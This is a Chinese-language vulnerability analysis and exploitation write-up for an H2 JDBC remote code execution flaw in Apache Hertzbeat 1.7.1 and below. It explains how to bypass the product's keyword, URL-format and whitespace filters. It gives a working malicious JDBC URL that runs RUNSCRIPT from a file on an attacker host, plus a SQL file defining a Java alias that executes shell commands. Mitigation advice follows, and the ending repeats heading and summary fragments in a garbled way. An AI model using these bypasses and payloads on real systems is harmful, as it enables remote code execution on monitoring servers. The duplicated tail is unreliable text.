Apache Hertzbeat<=1.7.1 H2 JDBC RCE漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Apache Hertzbeat是一个开源的实时监控系统，在1.7.1及以下版本中存在一个H2 JDBC远程代码执行漏洞。该漏洞源于对H2数据库JDBC连接URL的不当过滤，攻击者可以通过精心构造的JDBC URL绕过安全检测，实现任意代码执行。<\/p>

环境搭建<\/h2>

使用Docker快速搭建测试环境：<\/p>

docker run -d -p 1157:1157 -p 1158:1158 --name hertzbeat apache\/hertzbeat:1.7.1
<\/span><\/span><\/code><\/pre>访问地址：http:\/\/127.0.0.1:1157\/<\/code>

默认凭证：admin\/hertzbeat<\/p>
漏洞原理<\/h2>
H2数据库特性<\/h3>
H2数据库是一个内存数据库，支持通过JDBC URL执行SQL脚本。关键特性包括：<\/p>

支持RUNSCRIPT FROM<\/code>语法执行外部SQL文件<\/li>
JDBC URL格式灵活，有多种变体<\/li>
<\/ul>
Hertzbeat的防护机制<\/h3>
Hertzbeat实现了三重防护机制：<\/p>

关键字过滤<\/strong>：拦截runscript from<\/code>等危险关键词<\/li>
URL格式校验<\/strong>：使用正则表达式验证JDBC URL格式<\/li>
特殊字符过滤<\/strong>：过滤空格、制表符等控制字符<\/li>
<\/ol>
绕过技巧<\/h3>


关键字绕过<\/strong>：<\/p>

使用ru\nscript from<\/code>等换行方式绕过关键词检测<\/li>
<\/ul>
<\/li>

URL格式绕过<\/strong>：<\/p>

利用Linux与Windows路径解析差异<\/li>
标准H2内存模式URL：jdbc:h2:mem:testdb<\/code><\/li>
文件模式URL：jdbc:h2:file:E:\/tmp\/testdb<\/code><\/li>
绕过格式：jdbc:h2:\/\/mem\/testdb<\/code>（在Linux中解析为\/mem\/testdb<\/code>）<\/li>
<\/ul>
<\/li>

特殊字符绕过<\/strong>：<\/p>

使用不可见字符替代空格（如Unicode字符\u001C<\/code>）<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用步骤<\/h2>


创建自定义监控模板<\/strong>：<\/p>

参考官方代码编写H2类型的JDBC监控模板<\/li>
<\/ul>
<\/li>

构造恶意JDBC URL<\/strong>：<\/p>
jdbc:h2:\/\/mem\/.\/testdb;INIT=RUNSCRIPT\u001CFROM\u001C'http:\/\/attacker\/poc.sql'
<\/code><\/pre>
<\/li>

准备恶意SQL文件(poc.sql)<\/strong>：<\/p>
CREATE<\/span> ALIAS<\/span> EXEC<\/span> AS<\/span> 'void exec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);}'<\/span>;
<\/span><\/span>CALL<\/span> EXEC<\/span>('touch \/tmp\/fushuling'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

发送请求<\/strong>：<\/p>

通过Hertzbeat界面添加监控时使用构造的JDBC URL<\/li>
<\/ul>
<\/li>
<\/ol>
技术细节分析<\/h2>
Linux路径解析特性<\/h3>

POSIX系统中连续多个斜杠被视为单个斜杠<\/li>
jdbc:h2:\/\/mem\/testdb<\/code>在Linux中被解析为\/mem\/testdb<\/code><\/li>
H2会尝试在该路径创建数据库文件<\/li>
<\/ul>
不可见字符替代<\/h3>

空格可用Unicode控制字符替代，如：

\u001C<\/code> (文件分隔符)<\/li>
\u001D<\/code> (组分隔符)<\/li>
\u001E<\/code> (记录分隔符)<\/li>
\u001F<\/code> (单元分隔符)<\/li>
<\/ul>
<\/li>
<\/ul>
防护建议<\/h2>

升级到最新版本<\/li>
加强JDBC URL过滤：

严格限制URL协议和格式<\/li>
过滤所有Unicode控制字符<\/li>
<\/ul>
<\/li>
限制数据库连接权限<\/li>
实施最小权限原则<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了即使有多重防护机制，仍可能通过精心构造的输入绕过检测。开发人员需要全面考虑各种边界情况和系统特性，才能实现有效的安全防护。<\/p>

Apache Hertzbeat<=1.7.1 H2 JDBC RCE漏洞分析与利用<\/h1>

技术细节分析<\/h2>

总结<\/h2> 该漏洞展示了即使有多重防护机制，仍可能通过精心构造的输入绕过检测。开发人员需要全面考虑各种边界情况和系统特性，才能实现有效的安全防护。<\/p>

总结<\/h2>
该漏洞展示了即使有多重防护机制，仍可能通过精心构造的输入绕过检测。开发人员需要全面考虑各种边界情况和系统特性，才能实现有效的安全防护。<\/p>